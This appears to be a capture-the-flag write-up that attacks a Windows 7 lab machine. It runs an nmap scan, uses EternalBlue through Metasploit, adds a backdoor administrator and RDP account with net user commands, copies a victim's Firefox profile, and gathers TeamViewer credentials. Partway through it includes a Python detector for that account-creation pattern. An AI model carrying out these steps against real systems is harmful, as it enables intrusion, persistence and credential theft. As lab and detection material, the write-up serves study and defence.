So let's start with the nmap scan:

Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-02 09:44 EDT
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 1.25% done; ETC: 09:47 (0:02:38 remaining)
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 4.89% done; ETC: 09:45 (0:01:18 remaining)
Stats: 0:01:28 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 45.45% done; ETC: 09:46 (0:00:32 remaining)
Nmap scan report for 10.10.151.223
Host is up (0.047s latency).
Not shown: 65524 closed ports
PORT      STATE SERVICE     VERSION
135/tcp   open  msrpc              syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn        syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       syn-ack Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server? syn-ack
|_ssl-date: 2020-06-09T12:16:34+00:00; +2s from scanner time.
5357/tcp  open  http               syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
9001/tcp  open  tcpwrapped         syn-ack
49152/tcp open  msrpc              syn-ack Microsoft Windows RPC
49153/tcp open  msrpc              syn-ack Microsoft Windows RPC
49154/tcp open  msrpc              syn-ack Microsoft Windows RPC
49155/tcp open  msrpc              syn-ack Microsoft Windows RPC
49159/tcp open  msrpc              syn-ack Microsoft Windows RPC
49160/tcp open  msrpc              syn-ack Microsoft Windows RPC

So we can see it's a Windows machine with SMB (445) open, so why not check whether it's vulnerable to EternalBlue? Load up msfconsole, search for eternalblue and pick the auxiliary module that checks for it, and voilà, we are in luck: the machine is vulnerable. So let's try an EternalBlue exploit module. I normally use the psexec one but it didn't work this time, so I tried another one and it worked. Now let's look at the users and which groups they are in, which we can do by typing:

net users 

This lists all the users on the machine, which are Zachary and Timmy. Now let's find out some more about the users and run net user Zachary. From the output we can see this user is in the Administrators group. So let's do the same for Timmy.


So we could try changing these users' passwords or recovering them, but let's just add a user that has all the privileges we need, i.e. membership of Administrators and Remote Desktop Users,

by running:

net user nickapic password /add
net localgroup "Administrators" nickapic /add
net localgroup "Remote Desktop Users" nickapic /add

Now we can use the newly made account to RDP into the machine and check all the files and stuff we need.

xfreerdp /u:nickapic /p:password /v:<ip>

Once in, we have the Documents folders where we can find all the flags and everything we need, and we can also look at each user's Firefox history. We have to copy their AppData/Roaming/Firefox folder over our own AppData/Roaming/Firefox folder, then just look at what they were doing and collect all the flags.
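From the defender's side, as an added example that is not part of the original write-up: a small Python detector that correlates Windows Security events 4720 (user account created) and 4732 (member added to a security-enabled local group) to flag an account that is created and then added to Administrators or Remote Desktop Users within a short window, which is exactly the footprint the net user / net localgroup commands above leave in the Security log. The event records are constructed sample data, and for simplicity the sample puts the resolved account name in MemberName (real 4732 events often carry only the SID there, so a production version would resolve MemberSid first).

```python
from datetime import datetime, timedelta

# Local groups whose membership grants full control or remote logon.
PRIVILEGED_GROUPS = {"Administrators", "Remote Desktop Users"}
# Creation followed by privileged-group addition inside this window is suspicious.
WINDOW = timedelta(minutes=10)

# Constructed sample events: (ISO timestamp, event id, selected event fields).
# 4720 = user account created; 4732 = member added to security-enabled local group.
SAMPLE_EVENTS = [
    ("2020-07-02T09:50:01", 4720, {"TargetUserName": "nickapic", "SubjectUserName": "Zachary"}),
    ("2020-07-02T09:50:02", 4732, {"MemberName": "nickapic", "TargetUserName": "Administrators",
                                   "SubjectUserName": "Zachary"}),
    ("2020-07-02T09:50:03", 4732, {"MemberName": "nickapic", "TargetUserName": "Remote Desktop Users",
                                   "SubjectUserName": "Zachary"}),
    # Benign-looking noise: a service account added to a non-privileged group much later.
    ("2020-07-02T11:00:00", 4720, {"TargetUserName": "svc_backup", "SubjectUserName": "Timmy"}),
    ("2020-07-02T11:30:00", 4732, {"MemberName": "svc_backup", "TargetUserName": "Backup Operators",
                                   "SubjectUserName": "Timmy"}),
]


def find_rogue_admin_accounts(events, window=WINDOW, groups=PRIVILEGED_GROUPS):
    """Return {account: set(groups)} for accounts that were created (4720) and then
    added (4732) to one of `groups` within `window` of their creation."""
    created = {}  # account name -> creation time
    hits = {}
    for ts, event_id, fields in sorted(events, key=lambda e: e[0]):
        when = datetime.fromisoformat(ts)
        if event_id == 4720:
            created[fields["TargetUserName"]] = when
        elif event_id == 4732 and fields["TargetUserName"] in groups:
            member = fields["MemberName"]
            born = created.get(member)
            if born is not None and when - born <= window:
                hits.setdefault(member, set()).add(fields["TargetUserName"])
    return hits


if __name__ == "__main__":
    for account, grps in find_rogue_admin_accounts(SAMPLE_EVENTS).items():
        print(f"ALERT: new account {account!r} added to {sorted(grps)} shortly after creation")
```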

Technique 2:

First let's upgrade our shell to Meterpreter using the post-exploitation module shell_to_meterpreter.

Then we can use the credential-gathering module for the TeamViewer issue CVE-2019-18988: in our Meterpreter shell we just type run post/windows/gather/credentials/teamviewer_passwords

and it will give us the TeamViewer credentials.

If for some reason the password is not shown in full by the Metasploit module, the same thing can be done manually by querying the registry: